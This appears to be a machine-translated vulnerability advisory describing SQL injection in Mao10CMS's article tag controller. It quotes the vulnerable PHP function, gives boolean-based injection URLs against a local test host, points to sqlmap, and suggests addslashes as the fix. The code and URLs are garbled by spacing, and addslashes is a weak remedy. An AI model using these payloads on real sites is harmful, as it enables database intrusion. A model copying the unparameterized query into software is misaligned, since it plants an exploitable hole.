Mao10CMS SQL Injection

Mao10CMS SQL Injection

Mao10CMS SQL Injection

Vulnerability files:

Application \ Article \ Controller \ IndexController. class. php

Public function tag ($ tag, $ page = 1) {if (is_numeric ($ page) {// filter parameters $ condition ['type'] = 'Article '; $ date = strtotime ("now"); $ args_id = M ('meta ') -> where ("meta_key = 'tag' AND meta_value = '$ tag' AND type = 'basic'")-> getField ('page _ id', true ); // $ tag directly introduces $ condition ['id'] = array ('in', $ args_id); $ this-> page = M ('page ') -> where ($ condition)-> order ('date desc')-> page ($ page, mc_option ('page _ size')-> select (); // because Here is another sentence: $ count = M ('page')-> where ($ condition)-> count (); $ this-> assign ('id', $ id); $ this-> assign ('Count', $ count); $ this-> assign ('page _ now ', $ page); $ this-> theme (mc_option ('Theme ')-> display ('Article/termin ');} else {$ this-> error ('parameter error! ');}}

Local test connection:

Http: // 127.0.0.1/index. php? M = article & c = index & a = tag & tag = % E4 % BF % 9D % E8 % AF % 81



True: http: // 127.0.0.1/index. php? M = article & c = index & a = tag & tag = % E4 % BF % 9D % E8 % AF % 81% 27) % 20and % 201 = 1 -- % 201
 

False: http: // 127.0.0.1/index. php? M = article & c = index & a = tag & tag = % E4 % BF % 9D % E8 % AF % 81% 27) % 20and % 201 = 2 -- % 201
 

You can directly use sqlmap
 

 

Solution:

Parameter escape

Addslashes (str)